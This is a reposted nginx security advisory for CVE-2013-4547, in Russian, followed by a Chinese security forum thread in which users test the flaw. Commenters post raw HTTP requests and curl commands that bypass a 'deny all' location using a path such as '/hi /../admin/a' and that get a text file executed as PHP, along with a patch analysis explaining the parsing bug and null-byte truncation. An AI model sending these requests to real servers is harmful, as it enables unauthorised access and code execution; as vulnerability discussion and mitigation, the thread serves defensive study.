nginx security advisory (CVE-2013-4547)

  • A+
所属分类:lcx
Hello!

Ivan Fratric из Google Security Team обнаружил ошибку в nginx, которая
позволяет в некоторых случаях обходить ограничения безопасности с
помощью специального запроса, а также может иметь другие последствия
(CVE-2013-4547).

Некоторые проверки URI запроса не делались над символом, следующим за
незакодированным символом пробела (незакодированный пробел недопустим в
соответствии с протоколом HTTP, однако поддерживается начиная с nginx
0.8.41 из соображений совместимости).  Одним из результатов ошибки была
возможность получить доступ к файлу, закрытому с помощью ограничений
доступа вида

    location /protected/ {
        deny all;
    }

запросив его как "/foo /../protected/file" (в случае статических файлов -
только если существует каталог "foo ", с пробелом на конце), а также
возможность вызывать специальную обработку файла с пробелом на конце в
конфигурации вида

    location ~ .php$ {
        fastcgi_pass ...
    }

запросив файл как "/file .php".

Проблеме подвержены версии nginx 0.8.41 - 1.5.6.

Проблема исправлена в nginx 1.5.7, 1.4.4.

Патч, исправляющий проблему, доступен тут: http://nginx.org/download/patch.2013.space.txt В качестве временной защиты можно в каждом блоке server{}
воспользоваться конфигурацией вида:

    if ($request_uri ~ " ") {
        return 444;
    }


--
Maxim Dounin http://nginx.org/en/donation.html 

[source]

乌云讨论

1#

小胖子 (不忘初心,方得始终,想想当初来乌云是为了什么。) | 2013-11-20 10:02

我擦,又来~

2#

养乐多Ngan (Love Lvmm) | 2013-11-20 10:05

是解析漏洞吗?我怎么看是俄语的,脑袋晕了

3#

小胖子 (不忘初心,方得始终,想想当初来乌云是为了什么。) | 2013-11-20 10:07

从0.8.41就开始有的,这覆盖面。

4#

sex is not show | 2013-11-20 10:09

看不懂..

5#

养乐多Ngan (Love Lvmm) | 2013-11-20 10:15

@小胖子 俄文看不懂,是说类似这样的 robots.txt .php 这样使用?

6#

ppt (http://www.wooyun.org/.svn/entries?|nuf rof gnikcah|) | 2013-11-20 11:13

我看到了又一波刷分的节奏

7#

GaRY | 2013-11-20 11:24

http://mailman.nginx.org/pipermail/nginx-announce/2013/000125.html

英文在这里。不过貌似测试没成功,几位有成功的case么?

8#

Coody (&_&) | 2013-11-20 11:58

...

9#

he1renyagao () | 2013-11-20 12:01

@养乐多Ngan 应该不是这样吧 要有空格的

10#

冷冷的夜 (非本人) | 2013-11-20 12:08

测试失败nginx/1.5.6 ,球正确姿势

11#

养乐多Ngan (Love Lvmm) | 2013-11-20 12:13

@he1renyagao 打了一个空格了。测了几个,没发现有说明的漏洞。

12#

lpcdma | 2013-11-20 12:18

不知道这个漏洞有什么用。

http://www.baidu.com/test.php /../fuck/

这种会跳转到http://www.baidu.com/fuck

我看了自己的nginx服务器如果请求"/test .php",实际上就是请求的这个文件,这种文件很明显如果存在的话就是可以解析的。

13#

winsyk | 2013-11-20 13:25

这个漏洞不是像上次的那个解析漏洞,而是用来bypass访问一些被保护的目录。。

14#

Wdot (任意帖子感谢我一下,私信你一个xss.tw邀请码~) | 2013-11-20 18:06

试了下

这条规则

location /protected/ {
        deny all;
    }

直接访问 protected/index.php 就可以直接访问了。。。。。。,因为根本就不匹配

15#

xsser (十根阳具有长短!!) | 2013-11-20 18:10

GET /admin/a HTTP/1.1
Host: x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:25.0) Gecko/20100101 Firefox/25.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
GET /hi%20/../admin/a HTTP/1.1
Host: x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:25.0) Gecko/20100101 Firefox/25.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive

HTTP/1.1 403 Forbidden
Server: nginx/1.4.3
Date: Wed, 20 Nov 2013 10:09:37 GMT
Content-Type: text/html
Content-Length: 168
Connection: keep-alive


403 Forbidden

403 Forbidden


nginx/1.4.3
GET /hi /../admin/a HTTP/1.1
Host: x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:25.0) Gecko/20100101 Firefox/25.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive


HTTP/1.1 200 OK
Server: nginx/1.4.3
Date: Wed, 20 Nov 2013 10:10:02 GMT
Content-Type: application/octet-stream
Content-Length: 3
Last-Modified: Wed, 20 Nov 2013 09:43:22 GMT
Connection: keep-alive
ETag: "528c843a-3"
Accept-Ranges: bytes

OK

16#

xsser (十根阳具有长短!!) | 2013-11-20 18:10

第一个也是403

17#

xsser (十根阳具有长短!!) | 2013-11-20 18:13

需要一个带空格的目录

18#

心伤的胖子 (天凉好个球) | 2013-11-20 18:25

自己测试可以成功,只要有奇葩的程序员,还是有很大影响的。

目录带空格是 bypass 保护目录

文件带空格就是解析漏洞了

19#

winsyk | 2013-11-20 18:31

@Wdot 这个规则不是这样写的,是这样写的。

location ~ /protected/ {
        deny all;
    }

20#

winsyk | 2013-11-20 18:33

@xsser 如果是这样,那是不是有点鸡肋?

21#

猪头子 (妹子,要不要我帮你修电脑) | 2013-11-20 18:37

@心伤的胖子 表示你说的方法未成功 @xsser

22#

xsser (十根阳具有长短!!) | 2013-11-20 18:40

@猪头子 文件带空格没有测试成功

23#

xsser (十根阳具有长短!!) | 2013-11-20 18:40

@winsyk 相当鸡肋,千万不要轻易相信那些个动不动就xx互联网的漏洞 信乌云 :)

24#

心伤的胖子 (天凉好个球) | 2013-11-20 18:45

[email protected] ~$ curl "http://test.com/test.txt "                                                                                    1 ?


[email protected] ~$ curl "http://test.com/test.txt .php"


phpinfo()

[email protected] ~$ curl "http://test.com/test.txt%20.php"


phpinfo()

25#

心伤的胖子 (天凉好个球) | 2013-11-20 18:46

[email protected] ~$ curl -I "http://test.com/"
HTTP/1.1 200 OK
Server: nginx/1.1.19

26#

xsser (十根阳具有长短!!) | 2013-11-20 18:47

cat 1.txt

27#

xsser (十根阳具有长短!!) | 2013-11-20 18:47

curl "http://127.0.0.1/1.txt%20.php" -I
HTTP/1.1 404 Not Found
Server: nginx/1.4.3
Date: Wed, 20 Nov 2013 10:44:24 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.3.3

28#

疯狗 (谁淫荡啊谁淫荡) | 2013-11-20 18:48

@心伤的胖子 发下nginx配置?

29#

心伤的胖子 (天凉好个球) | 2013-11-20 18:49

location ~ .php$ {
    fastcgi_pass unix:/var/run/php5-fpm.sock;
    fastcgi_index index.php;
    fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;
    include fastcgi_params;
}

30#

xsser (十根阳具有长短!!) | 2013-11-20 18:51

location /admin/ {
        deny all;
    }
    location ~ .php$ {
        fastcgi_pass   127.0.0.1:9000;
        fastcgi_index  index.php;
        fastcgi_param  SCRIPT_FILENAME /usr/share/nginx/html$fastcgi_script_name;
        include        fastcgi_params;
    }

31#

xsser (十根阳具有长短!!) | 2013-11-20 18:52

@心伤的胖子 你这个是不是1.txt%00.php 都可以执行啊 我读书少 不要骗我

32#

心伤的胖子 (天凉好个球) | 2013-11-20 18:53

location /paypal/ {
    deny all;
}

目录是这样,同样可以。版本的问题?我试试高版本的。

33#

心伤的胖子 (天凉好个球) | 2013-11-20 18:54

[email protected] ~$ curl "http://test.com/test.txt%00.php"

400 Bad Request

400 Bad Request


nginx/1.1.19

我读书也不多,你可以看看。

34#

winsyk | 2013-11-20 18:56

@心伤的胖子 这样配置是错误的,你试试把nginx配置改成下边的试试,会出现403。。。

location ~ /paypal/ {
    deny all;
}

35#

心伤的胖子 (天凉好个球) | 2013-11-20 19:03

@winsyk 你这样 location ~ /paypal/ 就变成只要是目录名为 paypal 的都不能访问,无论是几级目录。

location /paypal/ 这个只是根目录下的 paypal 不能访问。

36#

乌拉拉 | 2013-11-20 19:04

我读书少,你们可以告诉我,是不是必须服务器上必须有一个尾部带空格的目录才可以跳?

37#

Wdot (任意帖子感谢我一下,私信你一个xss.tw邀请码~) | 2013-11-20 19:12

@winsyk

http://mailman.nginx.org/pipermail/nginx-ru/2013-November/052575.html 

这里说的就是

location /protected/ {
        deny all;
    }

38#

winsyk | 2013-11-20 19:31

@Wdot 我在我nginx上配置这个照样能访问,比如:

location /protected {
    deny all;
}

然后我在protected目录下创建a,在a目录下创建a/t.php,t.php内容为echo "hello world";

[[email protected] html]# curl http://127.0.0.1/protected

403 Forbidden

403 Forbidden


nginx/1.5.2
[[email protected] html]# curl http://127.0.0.1/protected/a

403 Forbidden

403 Forbidden


nginx/1.5.2
[[email protected] html]# curl http://127.0.0.1/protected/a/t.php
hello world[[email protected] html]#

在试试

location ~ /protected {
   deny all;
}
[[email protected] protected]# curl http://127.0.0.1/protected/a

403 Forbidden

403 Forbidden


nginx/1.5.2
[[email protected] protected]# curl http://127.0.0.1/protected/ 403 Forbidden

403 Forbidden


nginx/1.5.2
[[email protected] protected]# curl http://127.0.0.1/protected/a/t.php 403 Forbidden

403 Forbidden


nginx/1.5.2

最后访问的结果还是403,所以这种写法不对,记得改完nginx要重启下nginx或者重新加载配置。

39#

Nebula | 2013-11-20 20:20

意思就是说,常规条件下,连location ~ ^/WEB-INF/* { deny all; } 这个目录限制都绕不过了? 反正鸡肋最多就是用来做后门了!

40#

clozure | 2013-11-21 11:40

没啥意思,http://hi.baidu.com/tcpper/item/c8b540247179b7c4dcf69a93

41#

lpcdma | 2013-11-21 12:01

@心伤的胖子 这不科学啊。

42#

xsser (十根阳具有长短!!) | 2013-11-21 12:08

漏洞细节不说了,从补丁反过来看:

ngx_http_parse.c的617行和670行分别加了个p--,原因是nginx在ngx_http_parse_request_line的时候,本来有个对非法字符的检查和对"/"字符后的"."字符的检查:

538         case sw_check_uri:
......
593             case '':
594                 return NGX_HTTP_PARSE_INVALID_REQUEST;
595             }
和
479         case sw_after_slash_in_uri:
......
500             case '.':
501                 r->complex_uri = 1;
502                 state = sw_uri;
503                 break;
但是只要uri中有个空格,state就会跳到下面的分支:
598         /* space+ after URI */
599         case sw_check_uri_http_09:
600             switch (ch) {
601             case ' ':
602                 break;
603             case CR:
604                 r->http_minor = 9;
605                 state = sw_almost_done;
606                 break;
607             case LF:
608                 r->http_minor = 9;
609                 goto done;
610             case 'H':
611                 r->http_protocol.data = p;
612                 state = sw_http_H;
613                 break;
614             default:
615                 r->space_in_uri = 1;
616                 state = sw_check_uri;
617                 break;

这边把两种字符的检查都略过去了,所以补丁最后的方案是在几个空格后处理的部分都加上了p--,来重过检查

利用上面,越过null字符检查就可以不被bad request扔出来,给后端的fastcgi传个带null字符的scriptname,之后就截断了,如果php-fpm没有限制security的extentsion,而且可以上传个带空格的东东来真找到这个文件,就可以执行了。至于目录跨越那个,则是因为越过了对"/"后面"."的检查,而导致r->complex_uri标志位没有set上,也就不会在ngx_http_process_request_uri中去做ngx_http_parse_complex_uri来处理掉uri中的"..",最后导致location没匹配到,穿越了。

43#

winsyk | 2013-11-21 12:22

@xsser 赞。

文章来源于lcx.cc:nginx security advisory (CVE-2013-4547)

相关推荐: 服务器流量异常追踪--抵抗AWVS扫描

服务器流量异常追踪--抵抗AWVS扫描 xiaoL | 2013-11-06 02:55 上次发帖求教服务器流量异常处理,看了日志之后发现一坨扫描器留下的痕迹。 发现了WVS的扫描记录,小小的日志文件都被撑成几G大了...(服务器框架定义404页面,导致不存在…

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: